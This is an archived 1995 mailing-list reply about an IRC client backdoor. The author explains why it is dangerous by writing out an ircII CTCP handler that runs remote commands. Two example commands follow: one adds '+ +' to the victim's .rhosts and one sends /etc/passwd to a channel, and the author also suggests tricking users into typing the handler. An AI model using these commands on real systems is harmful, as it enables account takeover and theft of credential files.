Re: IRC Security Loophole

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: G.J.W. Hagenaars: "Re: your mail"
• Previous message: Scott D. Yelich: "Re: SEX (fwd)"
• In reply to: Silicon Avatar: "Re: IRC Security Loophole"
• Next in thread: Silicon Avatar: "Re: IRC Security Loophole"

On Fri, 3 Feb 1995, Silicon Avatar wrote:

> On Fri, 3 Feb 1995, Lorna Leong wrote:
> 
> > 
> > Hi,
> > 
> > I read somewhere that there is a security loophole in IRC. I don't know 
> > anything else about it but I would like to find out more information 
> > about this. I heard that information about this IRC loophole can be found 
> > by FTP at ftp.cert.org, but I couldn't find anything relevant there.
> 
> If you are talking about the "jupe" or "grok" hole.  It was temporary, and
> merely hacked version of the client floating around at "trusted" sites.
> 
> To my knowledge, these "hacks" have been removed and are no longer a threat
> (unless someone is propogating these older clients.)
> 
> Simply put, you could "CTCP grok [command]" (CTCP being a method of
> communication over IRC) someone, and have that command executed,
> unknowingly, off the account.

No, IRC holes are a more serious threat than you give then credit for. 
For example, if I were to add to a script (or better yet make someone 
type) the following:

/on ^ctcp "% % JUPE" $3-

They would be just as much in my control as if they were on a hacked client.
from this, you can do:

/ctcp <nick> JUPE /exec echo + + >> $HOME/.rhosts

or

/ctcp <nick> JUPE /red #<channel> /exec cat /etc/passwd

Theres more to IRC backdoors than making people say stupid stuff on a 
channel. I hope this example clears that up a little.



/dev/kmem


-
This sig deleted for brevity
-

• Next message: G.J.W. Hagenaars: "Re: your mail"
• Previous message: Scott D. Yelich: "Re: SEX (fwd)"
• In reply to: Silicon Avatar: "Re: IRC Security Loophole"
• Next in thread: Silicon Avatar: "Re: IRC Security Loophole"